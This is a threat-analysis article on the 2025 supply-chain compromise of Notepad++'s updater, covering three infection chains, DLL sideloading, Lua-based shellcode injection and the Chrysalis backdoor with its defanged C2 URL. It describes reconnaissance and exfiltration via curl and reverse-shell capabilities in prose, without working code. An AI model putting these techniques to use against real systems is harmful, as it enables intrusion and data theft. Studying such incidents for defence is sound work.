Inside the Notepad++ Supply Chain Breach: How the Chrysalis Backdoor Slipped Through the Updater

Between June and December 2025, attackers quietly compromised the update infrastructure of the widely used open-source text editor Notepad++. What began as a hosting-level breach evolved into a multi-stage supply chain attack that delivered tailored payloads to selected organizations across government, finance, and IT sectors in Asia-Pacific and Latin America.

The attackers did not tamper with the Notepad++ source code. Instead, they hijacked the update delivery path. For months, users who attempted to update the software were redirected to malicious servers hosting a weaponized update.exe.

How the Infrastructure Was Compromised

The breach originated in June 2025 when threat actors gained access to infrastructure at the hosting provider level. This access allowed them to intercept and redirect traffic intended for notepad-plus-plus.org.

Although direct access to the compromised server was lost in early September after scheduled maintenance and patching, the attackers retained valid internal service credentials. That foothold allowed them to continue redirecting download requests from getDownloadUrl.php to attacker-controlled servers until December 2, 2025.

The definitive remediation came only after the hosting provider rotated all credentials and hardened internal services. Shortly thereafter, Notepad++ released version 8.8.9, introducing signature and certificate validation in its WinGUp updater.

Three Infection Chains, One Objective

Forensic analysis revealed three distinct execution chains deployed through the malicious installer. Each chain began with reconnaissance and data exfiltration, then escalated to advanced payload deployment.

Infection Chain 1: ProShow Exploit and Cobalt Strike

The malicious NSIS installer first gathered system data using commands such as whoami and tasklist. The collected data was uploaded to a temporary hosting service using curl, with the file path embedded in a custom User-Agent string to notify the operator.

The installer then dropped files into %APPDATA%\ProShow, including a legitimate ProShow.exe and a malicious file named load. By exploiting a vulnerability in ProShow, attackers executed embedded shellcode that decrypted a Metasploit downloader, which subsequently deployed a Cobalt Strike Beacon for remote control.

Infection Chain 2: Lua Script Abuse via Alien FFI

The second chain mirrored the reconnaissance phase but pivoted to Lua-based execution. Files were dropped into %APPDATA%\Adobe\Scripts, including a compiled Lua script disguised as alien.ini.

The script leveraged the Alien FFI library to call native Windows APIs such as VirtualAlloc and EnumWindowStationsW, allocating executable memory and injecting shellcode directly into process space. The end result was again the deployment of Cobalt Strike infrastructure.

Infection Chain 3: The Chrysalis Backdoor

The most sophisticated chain involved sideloading a malicious DLL through a legitimate executable named BluetoothService.exe, placed in %APPDATA%\Bluetooth\.

The malicious log.dll exported functions called by the legitimate process. One function decrypted an embedded shellcode blob, while another executed it. This decrypted payload became known as the Chrysalis backdoor.

Chrysalis decrypted its main module using an XOR key and parsed configuration data encrypted with RC4. Its command-and-control endpoint masqueraded as a cloud API path: https://api.skycloudcenter[.]com/a/chat/s/70521ddf-a2ef-4adf9cf0-6d8e24aaa821.

Chrysalis Capabilities

Once active, Chrysalis established persistence through registry modifications or service creation. It collected system information including OS version, installed antivirus products, user and machine identifiers, encrypting the data before transmission.

Command tags received from the C2 server enabled a wide range of functionality:

• Interactive reverse shells via cmd.exe
• Remote process execution
• File read, write, and upload operations
• Self-destruct capability removing payloads and persistence keys

The modular architecture suggests a long-term espionage-oriented objective rather than opportunistic mass infection.

Why This Attack Matters

This incident demonstrates how supply chain attacks do not require source code tampering. Compromising update infrastructure is sufficient to inject malicious installers into trusted software distribution flows.

The use of legitimate executables for sideloading, Lua-based memory injection, and layered encryption techniques shows a level of operational maturity typically associated with advanced persistent threat groups.

Testing Defenses Against Supply Chain Attacks

Security validation platforms such as Picus Security offer simulation modules replicating these infection chains. Organizations can emulate Chrysalis loader threats, email-based infiltration attempts, and full supply chain scenarios to measure detection and response capabilities.

Given the complexity of the execution paths, signature-based detection alone is unlikely to suffice. Behavioral monitoring, strict updater signature verification, endpoint telemetry correlation, and outbound network inspection remain essential defensive layers.

Key Lessons

The Notepad++ supply chain compromise underscores a recurring theme in modern cyber operations: trust is the ultimate attack surface. When update mechanisms are subverted, even reputable software can become a delivery vector for advanced implants.

By the time version 8.8.9 introduced hardened updater verification in December 2025, the attackers had already maintained persistence in infrastructure for nearly half a year.

For defenders, the takeaway is clear. Monitoring update mechanisms, validating digital signatures rigorously, and simulating real-world supply chain attack chains are no longer optional controls. They are baseline requirements.